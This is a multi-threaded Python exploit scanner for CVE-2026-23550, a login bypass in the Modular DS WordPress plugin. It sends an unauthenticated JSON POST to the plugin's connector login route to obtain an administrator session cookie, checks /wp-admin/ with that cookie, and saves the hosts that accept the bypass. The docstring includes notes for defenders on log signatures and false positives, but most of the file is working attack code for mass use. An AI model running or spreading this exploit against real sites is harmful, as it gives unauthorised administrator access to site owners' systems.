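#!/usr/bin/env python3
"""
CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded)

https://github.com/dzmind2312

What the check does, as implemented below:

* For each target it sends one unauthenticated JSON POST to the Modular DS
  connector login route and then inspects the session's cookie jar for a
  ``wordpress_logged_in_*`` cookie.
* When such a cookie is present it requests ``/wp-admin/`` with that cookie
  and looks for a few marker words in the response body.

Operational notes for reviewers and defenders:

* The check is active, not passive. A positive result means the target has
  issued an authenticated session cookie to the scanner; the script does not
  log out or otherwise end that session afterwards.
* The traffic is easy to recognise in web-server access logs: a POST to
  ``/wp-content/plugins/modular-ds/api/modular-connector/login`` with the
  body ``{"origin": "mo"}``, followed on success by a GET of ``/wp-admin/``.
  Unless overridden, ``requests`` sends a ``python-requests/<version>``
  User-Agent.
* TLS certificate verification is disabled for every request, so responses
  are not authenticated and a result can be spoofed by an on-path party.
* The output file is a plain-text list of hosts judged vulnerable and should
  be handled as sensitive findings data.
* Remediation is outside the scope of this script: update the plugin to the
  vendor's fixed release (the fixed version is not stated on this page).
"""
import argparse
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests
import urllib3
from rich import print  # NOTE(review): shadows the builtin and is not used below
from rich.console import Console
from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn
from rich.table import Table

# Verification is switched off per session below; this silences the warning
# urllib3 would otherwise emit for every unverified HTTPS request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route probed by the check, relative to the site root.
_LOGIN_PATH = "/wp-content/plugins/modular-ds/api/modular-connector/login"

# Words looked for in the /wp-admin/ response body.
# NOTE(review): 'wp-admin' is likely to appear in the WordPress login page as
# well (a redirect to wp-login.php is followed by default), so this marker set
# can report a dashboard where there is only a login form -- confirm findings
# manually before acting on them.
_DASHBOARD_MARKERS = ('dashboard', 'wp-admin', 'welcome')


class ModularDSScanner:
    """Checks a list of WordPress sites for the Modular DS login bypass.

    Attributes:
        targets_file: Path of the text file holding one target per line.
        threads: Maximum number of worker threads.
        output: Path of the file that receives the vulnerable targets.
        vulnerable: Targets where the admin page check succeeded.
        results: One dict per target that returned a login cookie
            (keys ``target``, ``status``, ``cookies``).
        errors: Targets that could not be checked because a request failed.
    """

    def __init__(self, targets_file, threads=20, output="vulns.txt"):
        self.console = Console()
        self.targets_file = targets_file
        self.threads = threads
        self.output = output
        self.vulnerable = []
        self.results = []
        # Kept separately so a scan full of timeouts is not reported as clean.
        self.errors = []

    def test_target(self, target):
        """Test a single target for CVE-2026-23550.

        Args:
            target: Host or URL; ``https://`` is assumed when no scheme is given.

        Returns:
            A Rich-markup status line describing the outcome.

        Side effects:
            Appends to ``self.vulnerable`` / ``self.results`` on a positive
            result and to ``self.errors`` when the check could not complete.
            Called concurrently from worker threads; only ``list.append`` is
            used on shared state.
        """
        try:
            # Normalise the target into an absolute URL without trailing slash.
            if not target.startswith(('http://', 'https://')):
                target = 'https://' + target.lstrip('/')
            base = target.rstrip('/')

            # The session is closed on exit so pooled connections are not
            # leaked across thousands of targets.
            with requests.Session() as session:
                # Certificate checks are off: results are unauthenticated.
                session.verify = False

                # Unauthenticated request to the connector login route; only
                # the cookies it sets are of interest, not the body.
                session.post(
                    f"{base}{_LOGIN_PATH}",
                    json={"origin": "mo"},
                    headers={"Content-Type": "application/json"},
                    timeout=10
                )

                # A logged-in cookie after an unauthenticated request is the
                # primary indicator.
                admin_cookie = any(
                    'wordpress_logged_in_' in cookie.name
                    for cookie in session.cookies
                )
                if not admin_cookie:
                    return f"[dim]❌ Not Vulnerable: {target}[/dim]"

                # Secondary confirmation against the admin area.
                admin_resp = session.get(f"{base}/wp-admin/", timeout=5)
                body = admin_resp.text.lower()
                has_admin = any(word in body for word in _DASHBOARD_MARKERS)
                cookie_count = len(session.cookies)

            if has_admin:
                self.vulnerable.append(target)
                self.results.append({
                    'target': target,
                    'status': '🔥 FULL ADMIN ACCESS',
                    'cookies': cookie_count
                })
                return f"[green]✅ VULNERABLE: {target}[/green]"

            # A login cookie was issued but the admin page was not confirmed.
            # These targets appear in the table only, not in the output file.
            self.results.append({
                'target': target,
                'status': '⚠️ Admin Cookie (No Dashboard)',
                'cookies': cookie_count
            })
            return f"[yellow]⚠️ Admin Cookie: {target}[/yellow]"

        except Exception as e:
            # Deliberately broad: one unreachable or malformed target must not
            # abort the whole scan. The failure is recorded, not swallowed.
            self.errors.append(target)
            return f"[red]✗ Error: {target} ({str(e)[:50]})[/red]"

    def scan(self):
        """Run the check over every target and report the results.

        Reads ``self.targets_file`` (blank lines and lines whose first
        non-blank character is ``#`` are skipped), runs ``test_target`` on a
        thread pool, prints a summary table, and writes the vulnerable targets
        to ``self.output`` when there are any.
        """
        with open(self.targets_file, 'r', encoding='utf-8') as f:
            stripped = (line.strip() for line in f)
            # Filter on the stripped text so an indented '#' comment is not
            # treated as a target.
            targets = [entry for entry in stripped if entry and not entry.startswith('#')]

        self.console.print(f"""
[bold cyan]🔥 CVE-2026-23550 Modular DS Scanner 🔥
██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗
██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗
██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝
██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗
██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║
╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
https://github.com/dzmind2312
CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded)
[/bold cyan]
[bright_black]Targets: {len(targets)} | Threads: {self.threads} | Output: {self.output}[/bright_black]
""")

        # Rich progress bar
        with Progress(
            SpinnerColumn(),
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            console=self.console
        ) as progress:
            task = progress.add_task("Scanning Modular DS...", total=len(targets))

            # ThreadPoolExecutor rejects max_workers <= 0, so clamp to one.
            with ThreadPoolExecutor(max_workers=max(1, self.threads)) as executor:
                futures = {executor.submit(self.test_target, target): target for target in targets}

                for future in as_completed(futures):
                    self.console.print(future.result())
                    progress.advance(task)

        # Summary table
        self.console.print("\n" + "="*80)
        table = Table(title="Scan Results")
        table.add_column("Status", style="cyan")
        table.add_column("Target", style="magenta")
        table.add_column("Details", style="green")

        for result in self.results:
            table.add_row(
                result['status'],
                result['target'],
                f"{result['cookies']} cookies"
            )

        self.console.print(table)

        # Save vulnerable targets. The file is findings data: it names hosts
        # that accepted the bypass and should be stored accordingly.
        if self.vulnerable:
            with open(self.output, 'w', encoding='utf-8') as f:
                f.writelines(f"{vuln}\n" for vuln in self.vulnerable)
            self.console.print(f"\n[bold green]💾 {len(self.vulnerable)} vulnerable targets → {self.output}[/bold green]")
        else:
            self.console.print("\n[bold green]✅ No vulnerabilities found![/bold green]")

        # A target that errored was not checked; say so instead of letting it
        # count silently towards a clean result.
        if self.errors:
            self.console.print(
                f"[bold yellow]⚠️ {len(self.errors)} targets could not be checked "
                f"(request errors); the result is inconclusive for them[/bold yellow]"
            )


def main():
    """Parse the command line and run the scanner."""
    parser = argparse.ArgumentParser(description="CVE-2026-23550 Modular DS Scanner")
    parser.add_argument("-l", "--list", required=True, help="Targets file (one URL per line)")
    parser.add_argument("-t", "--threads", type=int, default=20, help="Max threads (default: 20)")
    parser.add_argument("-o", "--output", default="vulns.txt", help="Output file (default: vulns.txt)")

    args = parser.parse_args()

    scanner = ModularDSScanner(args.list, args.threads, args.output)
    scanner.scan()


if __name__ == "__main__":
    main()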